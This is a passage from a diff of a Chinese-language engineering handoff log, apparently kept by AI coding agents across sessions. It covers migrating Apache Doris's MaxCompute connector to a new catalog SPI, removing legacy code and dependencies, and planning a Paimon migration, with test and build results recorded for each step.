6-arg;4/5-arg + planScanForPartitionBatch 默认都委派至此)+ `MaxComputeWritePlanProvider.planWrite:92`("Writing",开 write session 前)。镜像 PR `isUnsupportedOdpsTable` + getSplits/beginInsert 守卫。 -- **测试(fold 进现有 3 文件 ↔ PR 3 测)**:`MaxComputeConnectorProviderTest` +6(D split-msg / MC default-off / 4×testConnection via `TestMaxComputeDorisConnector` seam 子类,offline 无 Mockito);`MaxComputeConnectorTransactionTest` +3(write reject ×2 + 负例);`MaxComputeScanPlanProviderTest` +3(read reject ×2 + 负例)。 -- **守门全绿**:`mvn -pl :fe-connector-maxcompute -am test` = **101 run / 0 fail / 0 err / 1 skip**(skip=OdpsLiveConnectivityTest 无 live env);**checkstyle 0 violations**;import-gate 净(仅加 connector-api + odps import,无 fe-core)。**mutation 验真**:`||`→`&&`(守卫) + `if(enableNamespaceSchema)` 取反(路由) → 精确 **8 红**(4 reject + 4 connectivity),还原后复绿。 - -## ✅ 追加(用户要求把 PR 3 个 groovy 回归测试也迁过来) -- **3 个 groovy 已迁**(`regression-test/suites/external_table_p2/maxcompute/`,皆 `p2,external` 活集成测,本地**无 live ODPS 无法跑**,仅结构核:三引号/花括号平衡、属性键与连接器 `MCConnectorProperties` 一致): - - 新增 `test_max_compute_validate_connection.groovy`(PR 原样,属性键全对得上 fork):4 catalog——default(无 test_connection)/explicit-false 用非法 endpoint `127.0.0.1:1` 应**建成功**(跳连通性);validate-project(test_connection=true) 应抛 `Failed to validate MaxCompute project`;validate-schema(+enable.namespace.schema) 应抛 `with namespace schema`。**断言子串与本 session (A) 实现的报错文案对齐**(经 `PluginDrivenExternalCatalog.checkWhenCreating` 包成 DdlException 后仍含该子串)。 - - 改 `test_external_catalog_maxcompute.groovy`:2 个 `${mc_db}` catalog 块加 `"test_connection"="true"`(replace_all 命中前 2 块;第 3 块 `other_mc_datalake_test` 不动 = 镜像 PR 仅 2 hunk)。 - - 改 `test_max_compute_schema.groovy`:namespace catalog 加 `"test_connection"="true"` + 补 EOF 换行(PR 同款)。 -- **fork odps SDK = 0.45.2-public**(upstream PR = 0.53.2);(A)/(C) 用的 API(`projects().exists`/`schemas().iterator`/`Table.isExternalTable·isVirtualView`)跨版本稳定、UT 已绿。 - -## ✅ 追加2 — (B) 裸 client 超时补全(用户定"补",DONE,门绿) -- 早期"(B) 已完成"判断**不准**:fork 只有 EnvironmentSettings/RestOptions 超时(`buildSettings`,仅 Storage API scan/write),**裸 odps client 超时缺失**——而 metadata/project/schema/testConnection 走的就是裸 client(`odps.getRestClient()`)。PR 的 (B) 正是在 `MaxComputeExternalCatalog.initLocalObjectsImpl` 设裸 client 超时。 -- **已补**:`MaxComputeDorisConnector.buildSettings` 内复用已解析的 3 个 int,加 `odps.getRestClient().setConnectTimeout/setReadTimeout/setRetryTimes`(零重复解析;0.45.2 API 已核存在)。故 `mc.connect_timeout/read_timeout/retry_count` 现作用于 metadata + 连通性调用。守门复跑 = **101/0/0/1 + checkstyle 0**,offline (A) 测不受影响(只 set 字段不联网)。 - -## 🎯 下一步(用户定) -- **10 文件 working tree 未 commit**(4 main + 3 UT + 3 groovy);push/PR 由用户定。 -- **`fe/pom.xml`**:PR 仅改 tea 依赖注释(非功能、且 fork fe-core 已 odps-free),无须迁。 -- **plan-doc 仅更本 HANDOFF**;PROGRESS/decisions/task-list 未动(本工为用户 ad-hoc PR 迁移、非 P-task;如需正式 ADR/进度同步可补)。 - -## ⚙️ 操作须知(复用 + 本 session 坑) -- 连接器测试模块**无 Mockito**(仅 junit-jupiter,纯 seam 直测)——迁 fe-core Mockito 测须改写:连接器校验类用 **protected-seam 子类覆盖**(连 ctx 可传 null、odps client 离线构造 AK/SK 不联网),表型 reject 用**纯静态守卫直测**(见 [[catalog-spi-fe-core-test-infra]])。 -- maven 绝对 `-f .../fe/pom.xml -pl :fe-connector-maxcompute -am test [-Dtest=X] -Dmaven.build.cache.enabled=false`;**必带 -am**;读真实 `Tests run:`/`BUILD`,勿信后台 echo exit。 -- 分支 `catalog-spi-06`。未跟踪 `.audit-scratch/`(本 session 测试 log)/`conf.cmy/`/`*.bak`/`scheduled_tasks.lock`(勿提交)。 - -
- ---- - -
📅 历史:第 17 次 handoff(2026-06-09)— 老 MaxCompute 代码移除 DONE(3 commit,全门绿) - -# 🔥 第 17 次 handoff(2026-06-09,覆盖)— 🎉 老 MaxCompute 代码移除 DONE(3 commit,全门绿) - -> **本 session**:用户确认 🅰 live ODPS e2e 绿后执行 Batch-D 删除。**基于最新 upstream `9ed49571b20`(#64253) 新建分支 `catalog-spi-06`**(upstream 已含全部 cutover+gap-fix 代码,与旧 `catalog-spi-05` tree 字节一致,已核:`git diff` 0 文件差)。**2 code commit + 1 doc commit,全部守门绿。** +> **本 session**:用户要求对 paimon 5 功能区(普通表读取 / 系统表读取 / procedure / DDL / mtmv)在旧框架的实现做全面 code-grounded 分析,映射到新 catalog SPI 框架设计,并对齐 maxcompute 连接器接口一致性。**本 session 仅调研 + 设计,0 产线代码。** ## ✅ 本 session 已完成 -- **删 legacy(`7a4db351100`)**:删 20 fe-core 文件(`datasource/maxcompute/*` 含 MCTransaction/MaxComputeScanNode|Split + 写/事务 plumbing + 2 测);清 21 反向引用文件(删 import + 死 instanceof/visitor/rule 分支,**保留**全部 PluginDriven/connector 兄弟分支 + §3 KEEP 集枚举/GsonUtils 串/block-id thrift);3 测 trim/rewire——**FrontendServiceImplTest** block-id RPC 测改用 generic `Transaction` mock(`getMaxComputeBlockIdRange` 现读 `PluginDrivenTransaction`,非 MCTransaction);**ExternalMetaCacheRouteResolverTest** 删 legacy `max_compute` engine 断言(插件路经 `ENGINE_DEFAULT`,已核 resolver fallback);**CommitDataSerializerTest** 删 MCTransaction 等价测。守门:test-compile(main+test) + checkstyle **0** + import-gate + grep-empty(`com.aliyun.odps` fe-core/src=∅、无非注释 code ref;`MaxComputeExternal|MCTransaction|MCInsert` 仅剩 GsonUtils 串 + 注释)全绿。 -- **依赖树彻底无 odps(`409300a75b8`,落实用户 Q2)**:删 fe-core/pom 两 odps 块;MCUtils 下沉 fe-common→be-java-extensions(`org.apache.doris.maxcompute`,删 legacy 后唯一消费者),JNI scanner/writer 删同包 import,MCProperties(odps-free 常量)留 fe-common;删 fe-common/pom 的 odps-sdk-core。**⚠️ 发现(DV-022)**:odps-sdk-core 此前**传递**给 fe-common 自身 `DorisHttpException`(netty)/`GsonUtilsBase`(protobuf)——删后编译暴露,fe-common 显式补 `netty-all`+`protobuf-java`。验收 `mvn -pl :fe-core dependency:tree | grep odps`=∅;fe-common+be-java-ext(max-compute)+fe-core 全编译。 -- **doc commit**:PROGRESS(P4 80%/maxcompute kanban 95%)+ deviations(DV-021 T3 四接受项 / DV-022 netty-protobuf)+ Batch-D 设计 §5「✅ EXECUTED」+ 本 HANDOFF。 - -## 🎯 下一步 -- **删除已完成**;剩 **push/PR**(用户定)。🅰 live e2e 用户已确认绿(本 session 解锁前提);静态分发审计(任务0 `reviews/P4-cutover-completeness-audit-2026-06-08.md` PASS)+ UT 层守门均绿。 -- 若日后要「fe-core 零 maxcompute 词元」= 另起 full-purge(泛化 block-id thrift / MC 枚举 / session var),用户当前**不取**(设计 §7.2 已评估升级兼容下限:GsonUtils 3 兼容串 + InitCatalogLog.Type.MAX_COMPUTE + 已持久化 TransactionType.MAXCOMPUTE 须留)。 - -## ⚙️ 操作须知 -- 分支 `catalog-spi-06`(off upstream/branch-catalog-spi,tracking 已设);本地 3 commit 未 push。未跟踪 `.audit-scratch/`/`conf.cmy/`/`*.bak`/`scheduled_tasks.lock`(勿提交)。 -- **删多模块 dep 时核传递依赖**(DV-022 教训:模块自身代码可能白拿被删 dep 的传递 jar,删前 `dependency:tree` + 删后编译验)。maven 绝对 `-f fe/pom.xml -pl : -am`,读真实 BUILD([[doris-build-verify-gotchas]])。 - -
- ---- - -
📅 历史:第 16 次 handoff(2026-06-09)— Batch-D 移除方案 finalize(design-only) - -# 🔥 第 16 次 handoff(2026-06-09,覆盖)— Batch-D 移除方案 finalize + @HEAD 校验(design-only) - -> **本 session 主题**:用户要求「完整移除 fe-core 下老的 maxcompute(零代码 + 零依赖)」。本 session **只分析 + finalize 方案 + 查前置,不动代码**(用户定:实际删除放下个 session)。**结论**:移除方案 = 既有 **Batch-D**(`tasks/designs/P4-batchD-maxcompute-removal-design.md`,本 session 已 @HEAD 校验 + finalize + 扩 §7/§8);唯一硬门 = 🅰 用户 live e2e。 - -## ✅ 本 session 已完成(design-only,0 代码) -- **完整分析**(3 轴,多 Agent + 亲核):① 翻闸状态——`max_compute` 已全走 SPI(`CatalogFactory.SPI_READY_TYPES`),legacy 运行时零可达,2026-06-07 评审的写/分区/DDL blocker 已全在代码修复;② fe-core footprint——20 删除文件 + ~84 反向引用(§2);③ maven——fe-core 直接 odps 仅 `pom.xml:364/379`,余经 fe-common 传递。 -- **Batch-D @HEAD 校验**(全过):20 文件全在;**linchpin** = fe-core 内 8 个 import odps 文件全在删除单元、单元外 residual=∅(pom drop 编译安全);近 commit `effd8edbfdb`/`2b8a732682c` 只动 `PluginDrivenScanNode`(KEEP 集),footprint 未变;**任务 0 静态分发审计已 DONE**(`reviews/P4-cutover-completeness-audit-2026-06-08.md` PASS,零 legacy 回退)。 -- **finalize Batch-D design**:① 删除集计数 **21→20** 就地修正;② §1 红线补 **LIMIT-split 第 3 行为副本**(等价物 P3-9 / `MaxComputeScanPlanProvider` `952b08e0cc8`)= 原 DOC task 交付;③ 新增 **§7**(范围定夺 + @HEAD 校验 + 前置门 + 验收基线)+ **§8**(fe-common odps 解耦方案 A)。 - -## 👤 用户定夺(2026-06-09) -- **Q1 = 只删老实现(Batch-D),非 full-purge**:保留 live SPI 插件路径在用的 `max_compute` 胶水词元(§3 KEEP 集)。 -- **Q2 = fe-core 依赖树彻底无 odps(升级,覆盖 [D-027] 决定2)**:经**方案 A**——把唯一用 odps 的 `MCUtils` 下沉到 be-java-extensions(其删 legacy 后唯一消费者)、`MCProperties`(odps-free 常量)留 fe-common、删 `fe-common/pom.xml` 的 odps。故不再「接受 fe-common 传递 odps」。详见 design §8。 -- **后果(by design)**:删后 `grep com.aliyun.odps fe-core/src`=∅ **且** `dependency:tree|grep odps`=∅;但 `grep maxcompute|max_compute|odps fe-core/src/main` 仍 >0(703→低百,SPI 胶水保留,非缺陷)。真正零词元 = 另起 full-purge(用户当前不取)。 - -## 🎯 下一 session = 执行 Batch-D 删除(gated on 🅰 live e2e) -- **Runbook = design §5**(T07+T08+T09 + §2 edits 作 **one compiling unit** → 守门 test-compile+checkstyle+import-gate → grep-empty 验收 → commit → §4 fe-core pom drop **+ §8 fe-common 解耦** → doc-sync)。**执行前按符号 re-grep**(§2 行号已漂移 +5~+43)。 -- **前置门**: - 1. 🅰 **live ODPS e2e 绿(用户跑,硬门,OPEN)**:`OdpsLiveConnectivityTest`(4 个 `MC_*` env)+ 手测 smoke(读/写/DDL/元数据全覆盖)。[D-027]:删 legacy 前 flip 须保持独立可 revert。 - 2. ⬜ **T3**(登记 4 条 Tier-3 DV,doc-only,可同批)。 -- **验收基线**(§7.4):`MaxComputeExternal|MCTransaction|MCInsert` 151→仅 §3 KEEP;`com.aliyun.odps` fe-core/src→∅;`dependency:tree|grep odps`→**∅**(含 §8)。 - -## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`;读真实 `BUILD`/`Tests run:`,勿信后台 task exit code。改 fe-core=`:fe-core`、改 fe-common=`:fe-common`、改 BE 扩展=`be-java-extensions/max-compute-connector`。 -- 删除 + 反向引用须 **one compiling unit**(Java 不 dead-strip 源符号引用);§3 KEEP 集勿删(GsonUtils 3 字面量、block-id thrift、各 MC 枚举、PluginDriven*)。§8 移 MCUtils 须在删 `MaxComputeExternalCatalog` 之后(否则 fe-core 仍需 MCUtils)。 -- 分支 `catalog-spi-05`,本地未 push。本 session **0 代码 commit**(仅 plan-doc:design §1/§5/§7/§8 + HANDOFF + PROGRESS + tracker DOC✅)。未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.groovy.bak`(勿提交)。 - -## 🧠 给下一个 agent 的 meta -- **🅰 live e2e(真实 ODPS)仍是翻闸 + 删除的真正完成门**;静态分发面(任务 0)已绿。 -- 范围已定:Batch-D / **fe-core 依赖树彻底无 odps(方案 A 下沉 MCUtils)**,勿擅自扩成 full-purge、也勿退回 [D-027] 的「接受传递」。 -- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);FE 分发缺口史([[catalog-spi-cutover-fe-dispatch-gap]],任务0已复核 PASS);构建坑([[doris-build-verify-gotchas]])。 - -
- ---- - -
📅 历史:第 15 次 handoff(2026-06-08)— G2 + GC1 完成 - -# 🔥 第 15 次 handoff(2026-06-08,覆盖)— G2 + GC1 完成 - -> **本 session 主题**:完成 Batch-D 红线扩充 gap campaign 的 **G2 + GC1**(两者逻辑独立、触不同区:G2=读谓词路径连接器局部 / GC1=写事务路径 + fe-core session 透传)。各走 recon 核码(Rule 8)→ 独立 design doc →(Ultracode off,沿用前 4 issue 的 skip 设计验证 workflow 默认)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ 单 Agent 对抗 impl-review → 独立 `[P4-T06e]` commit + hash 回填。**两 issue 全 DONE,4 commit。** - -## ✅ 本 session 已完成 - -- **G2 FIX-PREDICATE-COLGUARD(Tier 2,minor,多半不可达)DONE @`fefbbad391d`(+回填 `1eeea30abcb`)**:列不存在守卫反转。`MaxComputePredicateConverter.formatLiteralValue:211` 在 `columnTypeMap.get(columnName)==null` 时静默引号化、下推非法谓词(如 `ghost == "5"`,整型字面量被错误引号化),而非 legacy 那样丢谓词(legacy `MaxComputeScanNode` containsKey 守卫→throw→caller per-conjunct catch 丢谓词)。**修**=该 null 分支 `return` → `throw UnsupportedOperationException`(与同方法 :198/:204/:260 既有守卫一致;连接器禁 import fe-core 的 AnalysisException),经 `convert()` 既有顶层 catch(:91-96)降级 `NO_PREDICATE` → BE 复算 = legacy「丢谓词」本质不变式。**correctness 已核(impl-review)**:MaxComputeConnectorMetadata 未 override applyFilter → conjuncts 永不在 BE 端 clear → 整树降级仅 perf、永不错结果;limit-opt 不交互(unknown 列不过 partition-equality 闸)。粒度差异(整 filter vs legacy per-conjunct)非本 fix 引入、correctness-safe。UT 16/16(+3)+ mutation 2 红。impl-review 单 Agent **APPROVE**(0 must-fix;nit=IS NULL 路 convertIsNull 无守卫=legacy parity 故意 out-of-scope)。 -- **GC1 FIX-BLOCKID-CAP-CONFIG(Tier 2,minor,写路径)DONE @`95575a4954d`(+回填 `eee07156e77`)**:写 block-id 上限硬编 `MAX_BLOCK_COUNT=20000L`(`MaxComputeConnectorTransaction:72`),无视 legacy 可调 `Config.max_compute_write_max_block_count`(`Config.java:2156`,fe.conf 可调)→ 调优部署静默回归。原硬编=已登记偏差 **DV-011**。**用户定 Option A(全局 Config 透传,true parity,反转 DV-011 的 Rule-2 推迟)**:连接器禁 import Config,故经 **session-property 通道透传**(镜像既有 `lower_case_table_names` 注入)——① fe-core `ConnectorSessionBuilder.extractSessionProperties` +1 行注入 `Config.max_compute_write_max_block_count`;② 连接器 `MaxComputeConnectorTransaction` 常量→实例字段 `maxBlockCount` + ctor 加参 + `DEFAULT_MAX_BLOCK_COUNT` fallback;③ 连接器 `MaxComputeConnectorMetadata` byte-identical key 常量 + map-typed `resolveMaxBlockCount`(absent/unparseable→DEFAULT 20000,零回归)+ `beginTransaction` 透传。**无 SPI 签名变更、import-gate 净**。UT 新 `MaxComputeConnectorTransactionTest` 5 + mutation M1(resolve 忽略 prop)/M2(cap 用 DEFAULT)共 3 红。impl-review 单 Agent **APPROVE-WITH-NITS**(0 must-fix)。**DV-011 已更新**(后续动作勾销:经 session-passthrough 恢复可调、非原拟 MCConnectorProperties[catalog-scoped 错 scope])。 - -## 👤 用户定夺(2026-06-08) -- **GC1 = Option A(全局 Config 透传,经 session-property)**——非原 DV-011 拟的 MCConnectorProperties(per-catalog,错 scope,非 legacy parity)。理由(采纳):legacy 读的是 fe 全局 Config,须读同一全局值方 true parity;session-property 通道有 `lower_case_table_names` 直接先例、无 SPI 变更。见 [[catalog-spi-connector-session-tz-gotcha]](连接器禁 import fe-core、经 session prop 读约定)。 -- **G2/GC1 = 沿用前批 skip 设计验证 workflow + 单 Agent 对抗 impl-review**(Ultracode off,同 G0/G5/G6/G7)。 - -## 🎯 下一 session = 🆕 翻闸完整性审计(零 legacy 回退)+ T3 + DOC(用户定,2026-06-08) - -> **🎉 Batch-D 红线扩充 gap campaign 的 Tier 1+2 fix 已全清**(G8/G0/G6/G5/G7/G2/GC1)。剩余 = ① 🆕 翻闸完整性审计(用户 2026-06-08 新增,下「任务 0」,无产线代码、可能查出新 gap)② T3 接受项登记 ③ 原 DOC 交付。 - -### 🆕 任务 0(用户新增 2026-06-08,优先)— 确认所有 MaxCompute 操作走新 SPI、零 legacy 回退 - -> **用户原话**:确认所有 maxcompute 的操作,都走到新的 SPI 框架上,不允许回退到老的代码上。 - -**目标**:对 `max_compute` catalog 的**每一类操作**,证 FE 分发可达新 SPI/PluginDriven 实现,且 legacy `MaxCompute*` 对应路径在运行时**零可达**(无静默回退)。= 🅱 Batch-D 删 legacy 的**静态前置确认**(零可达调用方 → 删除才安全)。 - -**审计范围(逐类核「FE 入口 → SPI 路由」+「legacy 路径零可达」)**: -- 读:scan / 分区裁剪(P1-4) / 谓词下推(G0/G2) / limit-split(P3-9) / batch-mode(P3-11) / CAST 剥壳(F9)。 -- 写:INSERT / INSERT OVERWRITE(P0 gate) / 事务 begin·commit·block-alloc(GC1) / sink 分发(P0-2) / bind 投影(P0-3) / post-commit(P3-12)。 -- DDL:CREATE TABLE·CTAS(P2-7) / DROP TABLE / CREATE DB(P2-6) / DROP DB FORCE(P2-5) / CREATE CATALOG 校验(G6)。 -- 元数据:list db/table / get schema / DESCRIBE isKey(P3-10) / SHOW PARTITIONS / partitions() TVF。 - -**已知风险区(必查、勿信先验「已修」标签 — Rule 8/12)**: -- ⚠️ **FE 分发缺口** [[catalog-spi-cutover-fe-dispatch-gap]]:`PluginDrivenExternalCatalog` 仅 override `createTable`、`metadataOps` 曾永 null → DROP TABLE / CREATE DB / DROP DB / SHOW PARTITIONS / partitions TVF 的 FE 分发是否真接 SPI。**该 memory 的「已修完」状态 2026-06-07 对抗 review 两度被证伪**(见 `plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`)→ 必须逐路径重核,不得信任何「已修」标签。 -- legacy 删除候选逐个确认对 `max_compute` **零运行时可达调用方**:`MaxComputeExternalCatalog` / `MaxComputeScanNode` / `MaxComputeMetadataOps` / `MCTransaction` / `PhysicalMaxComputeTableSink` / `bindMaxComputeTableSink` / `allowInsertOverwrite` 的 MC 分支 / `MaxComputeExternalTable`。 -- 「分发只接一半」反模式(已多次踩:P0 overwrite 顶层网关挡死下层;FE 仅 override createTable):每个 op 须核**完整**分发链,非仅「连接器实现存在」。 - -**成功标准(Rule 4,强标准供独立 loop)**:产出审计报告(建议 `plan-doc/reviews/P4-cutover-completeness-audit-.md`)——每 op 一行:路由✅(FE 入口→SPI 实现 file:line) / 回退⚠️(file:line + 判据);任何回退/缺口登记为新 gap 进 `plan-doc/task-list-batchD-redline-gaps.md` 修复。**法**:grep + 调用链 trace(SPI_READY catalog 经 `PluginDrivenExternalCatalog`/`PluginDrivenExternalTable`→`PluginDrivenScanNode`);可选 clean-room 对抗 workflow(需用户 opt-in,复用 `plan-doc/reviews/maxcompute-full-rereview.workflow.js`)。 - -**关系**:本任务 ⊇ 既有「Batch-D redline 扩充」DOC 的 zero-survivor 复核(DOC 是其产物/子集);与 🅰 live e2e 并列为 🅱 Batch-D 删 legacy 的两大解锁门(本任务 = 静态分发面、🅰 = 运行时真值面)。 - -### 任务 1–2(原计划,T3 + DOC) - -1. **T3 Tier-3 DV batch(GAP3/4/9/10,登记 deviation,无代码)**:在 `plan-doc/deviations-log.md` 登记 4 条接受项 + 各 file:line + 接受理由: - - GAP3 CREATE DB 非-IFNE:`ERR_DB_CREATE_EXISTS`(1007/HY000 本地预抛)→透传 ODPS DdlException(P2-6 已注 pre-existing)。 - - GAP4 DROP TABLE 非-IF-EXISTS+远端缺:`ERR_UNKNOWN_TABLE`(1109/42S02)→通用 DdlException(本地名)。 - - GAP9 SHOW PARTITIONS `LIMIT`:legacy paginate-then-sort → 新路 sort-then-paginate(新路更合 ORDER-BY-LIMIT)。 - - GAP10 partitions() TVF:schema-分区但零实例表 legacy 抛→新路返 0 行(已有 in-code 注释声明 intentional)。 -2. **DOC:Batch-D redline 扩充**(原任务交付,仍欠):把全部行为逻辑副本作 must-land-before-delete 红线补入 `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md` §1/§2;更正 scan-node 红线注漏列 **LIMIT-split 第 3 行为副本**(等价物在 P3-9,注应 cite);登记 ES `EsTypeMapping:191` 同款 emit "NULL" latent token bug(G7 out-of-scope,留待 ES 翻闸)。 - -> 其后:**🅰 live e2e 终验(真实 ODPS)= 翻闸真正完成门**(所有静态修复 DV 真值闸须 live 验,CI 跳;G2 ~不可达无自然 live 路、GC1 = fe.conf 调 block 上限→大写入越限/放宽)→ **🅱 Batch-D 删 legacy(21 文件,gated on live e2e)**。详见下方折叠历史。 - -## ⚙️ 操作须知(复用 + 本 session 新坑) -- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl :` + `-Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-maxcompute`、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 task exit code。 -- **本 session 新坑(重要)**:`.m2` 里 `fe-connector-spi` 安装的 pom 含字面 `${revision}` parent token → 独立 `-pl :fe-connector-maxcompute test`(**无 `-am`**)报 dependency resolution `fe-connector:pom:${revision} (absent)`(负缓存、不自动重试)。**解法 = 一律带 `-am`**(reactor 内解析 ${revision},绕过 .m2 坏 pom):`mvn -f fe/pom.xml -pl :fe-connector-maxcompute -am test [-Dtest=X -DfailIfNoTests=false] -Dmaven.build.cache.enabled=false`。⚠️ `-am install -DskipTests` **不修**该负缓存(仍须 -am 跑测)。 -- mutation:cp 备份产线到 `/dev/shm`(RAM)→ Edit 重引入 bug → `-am test` 确认向红 → cp 还原 → grep 验还原。改连接器 ctor/常量时注意单 caller(`new MaxComputeConnectorTransaction` 仅 beginTransaction + 新 test)。 -- 分支 `catalog-spi-05`,本地未 push。本 session 4 commit。未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.groovy.bak`/`.claude/scheduled_tasks.lock`(勿提交)。 -## 🧠 给下一个 agent 的 meta -- **live e2e(真实 ODPS)仍是翻闸真正完成门**——本批为静态/UT 层判定。 -- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);测基建无 fe-core/无 mockito、child-first loader([[catalog-spi-fe-core-test-infra]]);clean-room 对抗偏好([[clean-room-adversarial-review-pref]]);构建/守门坑([[doris-build-verify-gotchas]],本 session 已补 maven `-am` 必带 / ${revision} 负缓存坑)。 - -
- ---- - -
📅 历史:第 14 次 handoff(2026-06-08)— G6 + G5 + G7 批量完成 - -# 🔥 第 14 次 handoff(2026-06-08,覆盖)— G6 + G5 + G7 批量完成 - -> **本 session 主题**:批量修复 Batch-D 红线扩充 gap campaign 的 **G6 + G5 + G7**(三者逻辑独立、触不同区)。各走 recon 核码 → 独立 design doc →(Ultracode off,用户定 skip 设计验证 workflow)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ 单 Agent 对抗 impl-review → 独立 `[P4-T06e]` commit + hash 回填。**三 issue 全 DONE,6 commit。** - -## ✅ 本 session 已完成 +- **14-agent workflow recon + cross-cut 对抗复审**(5 区 fe-core 旧实现 + 新 SPI 面 + MC 样板 + 连接器现状 → 5 区 old→new 设计 → 跨切面 critic),主线 firsthand 核 4 个 load-bearing 锚点(SPI_READY_TYPES / GSON 7 注册 / PluginDrivenExternalTable 无 MTMV / ConnectorPartitionInfo.lastModifiedMillis 已存在)。 +- **产物 1**:[`research/p5-paimon-migration-recon.md`](./research/p5-paimon-migration-recon.md) —— 5 功能区旧实现 + E1–E10 SPI 状态 + 跨切面风险 + **MC 一致性 11 约定** + 测试基线 + 沿用坑。 +- **产物 2**:[`tasks/P5-paimon-migration.md`](./tasks/P5-paimon-migration.md) —— old→new 映射表 + **30 TODO 分 B0–B9 批** + 批次依赖图 + 验收标准 + 开放决策(已签字)。 +- **doc 同步**:`connectors/paimon.md`(修 3 stale 表述)、`decisions-log.md`(+D-037/D-038,计数 36→38)、`PROGRESS.md`(header/§一/§二/§三/§四/§六/§七)、本 HANDOFF(覆盖)、auto-memory `catalog-spi-p5-paimon-design`。 -- **G6 FIX-CREATE-CATALOG-VALIDATION(Tier 2,major)DONE @`1fc00178484`(+回填 `8bc2c5cade2`)**:`MaxComputeConnectorProvider` 未 override `validateProperties`(继承 SPI no-op)→ CREATE CATALOG 跳过全部属性校验(required PROJECT/ENDPOINT、split floor、account_format、timeout>0、auth)。**修**=override `validateProperties` 逐字镜像 legacy `MaxComputeExternalCatalog.checkProperties:388-457` 六校验、抛 `IllegalArgumentException`(经 `PluginDrivenExternalCatalog.checkProperties:159` catch→DdlException,= legacy 形态);wire 既有 dead `MCConnectorClientFactory.checkAuthProperties`(4 处 RuntimeException→IllegalArgumentException,零调用方安全)。required ENDPOINT 取**字面 key**(= legacy CREATE parity;region/odps_endpoint 为 replay backward-compat、不在新 CREATE 接受;impl-review 证 `CatalogMgr` `!isReplay`-gated、老 catalog 不受影响)。UT `MaxComputeConnectorProviderTest` 19/19 + mutation 3 组向红。impl-review 单 Agent **APPROVE-WITH-NITS**(0 must-fix;nit=纠正 legacy 错误 message 文案,故意改)。 -- **G5 FIX-AGG-COLUMN-REJECT(Tier 2,minor)DONE @`c5e8ba6d9e2`(+回填 `aa28c97f8ef`)**:`CREATE TABLE (c INT SUM)` 对 mc 表静默建普通列(**证伪 P2-8「非-OLAP 路径已覆盖聚合列」**)。nereids 唯一拒 bare 非-key aggType 的 `validateKeyColumns` 仅在 `ENGINE_OLAP` 块内被调、非-OLAP 不可达。**用户定 Option B(加 SPI 字段,非 HANDOFF 原倾向的 fe-core guard)**——逐字镜像 P2-8 isAutoInc:`ConnectorColumn` 加 additive 第 8 字段 `isAggregated`(8-arg ctor、7-arg 委托 default false、getter/equals/hashCode;全 25 call site 仅 converter 改 8-arg)+ `CreateTableInfoToConnectorRequestConverter` 算 `isAggregated = getAggType()!=null && !=AggregateType.NONE`(= `Column.isAggregated()`)+ `MaxComputeConnectorMetadata.validateColumns` 在 isAutoInc 检查后加 `if(col.isAggregated())throw`(逐字镜像 legacy `MaxComputeMetadataOps.validateColumns:426-429`,**相邻** auto-inc 分支)。over-rejection 已核(隐式 aggType 赋值块 isOlap-gated、validate(isOlap=false))。UT 4/4/11 + mutation 3 组向红。impl-review **APPROVE**(0 must-fix)。 -- **G7 FIX-VOID-TYPE-MAPPING(Tier 2,minor)DONE @`49113dc7860`(+回填 `74822486792`)**:ODPS VOID 列映 UNSUPPORTED(legacy=Type.NULL)。`MCTypeMapping` VOID emit token `"NULL"`,但 `ScalarType.createType` 只认 `"NULL_TYPE"`("NULL" 抛→`ConnectorColumnConverter` catch→UNSUPPORTED)。**修**=连接器局部:① VOID token `"NULL"`→`"NULL_TYPE"`(fe-core convertScalarType default 即产 Type.NULL,无需改 fe-core);② switch default `return UNSUPPORTED`→`throw DorisConnectorException`(fail-fast,镜像 legacy `mcTypeToDorisType:294`)。**fix-2 安全性**:BINARY/INTERVAL_*/JSON 显式 UNSUPPORTED case 不受影响;impl-review 经 24-值 OdpsType 枚举 set-diff 证**仅 `OdpsType.UNKNOWN`(SDK sentinel、非真实列类型)落 default**、legacy 对 UNKNOWN 同 throw→parity、真实表零回归。UT `MCTypeMappingTest` 5/5 + mutation 2 组向红。impl-review **APPROVE**(0 must-fix)。**out-of-scope(留待 ES 翻闸)**:ES `EsTypeMapping:191` 同款 emit "NULL" latent token bug(其 test 还钉了 buggy token),未修。 +## 👤 用户签字决策(2026-06-09) -## 👤 用户定夺(2026-06-08) -- **G5 = Option B(加 SPI 字段 `isAggregated`)**——非 HANDOFF 原倾向的 fe-core guard。理由(采纳):聚合拒绝是 legacy `validateColumns` 中 auto-inc 拒绝的**相邻行**,连接器 `validateColumns` 已含 `isAutoInc` 检查,Option B 完成同方法的 legacy 镜像;且与 P2-8 一致(full parity 非 deviation)。见 [[catalog-spi-p2-ddl-decisions]]。 -- **G6/G7 = 直接 implement(无单独设计验证 workflow,Ultracode off)**,走守门 + 单 Agent impl-review。 -- **G7 secondary defect(未知 OdpsType fail-fast)= 纳入修复**(parity + Rule 12 fail-loud;零现表风险;经 `TypeInfoFactory.UNKNOWN` 可 UT)。 -- **下一 session = G2 + GC1**(本次定)。 +- **D-037(P5-D1,flavor 模型)= A 单 Catalog + flavor switch**:6 flavor(hms/filesystem/dlf/rest/jdbc) 在 `PaimonConnector.createCatalog` 内 switch on `paimon.catalog.type`,拷 warehouse/conf/S3-normalize + 重建 Hadoop·HiveConf + **每-flavor ExecutionAuthenticator** 入模块(MC 一致)。**不**建 backend 模块(5 个 `fe-connector-paimon-backend-*` 是空壳)。 +- **D-038(P5-D2,MTMV/MVCC scope)= A P5 内实现桥**:fe-core 新建 `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现 MTMVRelatedTableIf/MTMVBaseTableIf/MvccTable + 首个真 E5 消费者 override `beginQuerySnapshot` 三方法。**翻闸(B7) gated on MTMV 桥(B5)**;**禁**静默读 